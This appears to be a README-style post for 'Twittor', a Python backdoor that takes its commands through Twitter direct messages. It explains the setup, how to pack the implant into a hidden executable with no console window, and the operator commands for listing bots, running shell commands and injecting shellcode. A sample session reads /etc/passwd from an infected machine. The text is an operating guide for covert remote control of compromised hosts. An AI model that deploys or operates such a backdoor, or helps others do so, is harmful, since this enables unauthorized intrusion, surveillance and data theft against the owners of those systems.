Twittor is a stealthy Python based backdoor using Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat which does the same but using a Gmail account.
Setup
For this to work you need:
- A Twitter account (Use a dedicated account! Do not use your personal one!)
- Register an app on Twitter with Read, write, and direct messages Access levels.
Install the dependencies:
1 |
$ pip install –r requirements.txt |
This repo contains two files:
twittor.py
which is the clientimplant.py
the actual backdoor to deploy
In both files, edit the access token part and add the ones that you previously generated:
ACCESS_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’
ACCESS_TOKEN_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’
USERNAME = ‘XXXXXXXXXXXXXXXXXXXXXXXX’
1 2 3 4 5 6 7 |
CONSUMER_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ CONSUMER_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ ACCESS_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ ACCESS_TOKEN_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ USERNAME = ‘XXXXXXXXXXXXXXXXXXXXXXXX’ |
You’re probably going to want to compile implant.py
into an executable using Pyinstaller. In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile
will help. Just saying.
Usage
In order to run the client, launch the script.
1 |
$ python twittor.py |
You’ll then get into an ‘interactive’ shell which offers few commands that are:
refresh – refresh C&C control
list_bots – list active bots
list_commands – list executed commands
!retrieve <jobid> – retrieve jobid command
!cmd <MAC ADDRESS> command – execute the command on the bot
!shellcode <MAC ADDRESS> shellcode – load and execute shellcode in memory (Windows only)
help – print this usage
exit – exit the client
$
1 2 3 4 5 6 7 8 9 10 11 12 |
$ help refresh – refresh C&C control list_bots – list active bots list_commands – list executed commands !retrieve <jobid> – retrieve jobid command !cmd <MAC ADDRESS> command – execute the command on the bot !shellcode <MAC ADDRESS> shellcode – load and execute shellcode in memory (Windows only) help – print this usage exit – exit the client $ |
Once you’ve deployed the backdoor on a couple of systems, you can check available clients using the list command:
$ list_bots B7:76:1F:0B:50:B7: Linux–x.x.x–generic–x86_64–with–Ubuntu–14.04–precise $ |
The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.
Let’s issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd [+] Sent command “cat /etc/passwd” with jobid: UMW07r2 $ |
Here we are telling B7:76:1F:0B:50:B7
to execute cat /etc/passwd
, the script then outputs the jobid that we can use to retrieve the output of that command.
You can download Twittor here:
Or read more here.